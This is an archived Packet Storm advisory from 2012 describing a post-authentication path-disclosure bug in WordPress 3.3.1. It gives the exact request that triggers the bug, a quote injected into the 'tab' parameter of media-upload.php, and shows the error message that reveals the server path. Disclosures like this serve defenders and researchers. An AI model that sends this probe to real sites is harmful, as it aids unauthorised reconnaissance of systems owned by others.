exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress 3.3.1 Post-Auth Information Disclosure

WordPress 3.3.1 Post-Auth Information Disclosure
Posted Mar 11, 2012
Authored by HauntIT

WordPress version 3.3.1 post authentication information disclosure vulnerability.

tags | exploit, info disclosure
SHA-256 | 564e76972c3aaeb2b57fedf35fc7f39fbdd135b7a0590abe9b20675231c1fd45

WordPress 3.3.1 Post-Auth Information Disclosure

Change Mirror Download
# TITLE ....... # Wordpress 3.3.1 post-auth information disclosure .... #
# DATE ........ # 17.02.2012 .......................................... #
# AUTOHR ...... # http://hauntit.blogspot.com ......................... #
# SOFT LINK ... # http://wordpress.org ................................ #
# VERSION ..... # 1.0.0 ............................................... #
# TESTED ON ... # LAMP ................................................ #
# ..................................................................... #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)

# 2. What is the type of vulnerability?
This vulnerability shows us full path to Wordpress installation on server.
Information disclosure bug.

Vulnerability can be triggered by users with 'subscriber' role.
For some cases bug is available for 'editor'-role users too.

# 3. Where is bug :)
Go to Your /wordpress/wp-admin/media-upload.php?type=image&tab='&post_id=6

You should see now something similar to:
"Fatal error: Maximum execution time of 30 seconds exceeded in
/path/to/your/wordpress/wp-includes/plugin.php on line 148."

So:
@Wordpress/wp-includes$ cat -n plugin.php | grep 148
148 array_pop($wp_current_filter);

Enjoy ;)

# 4. More...

- http://www.wordpress.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

# Best regards
#
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close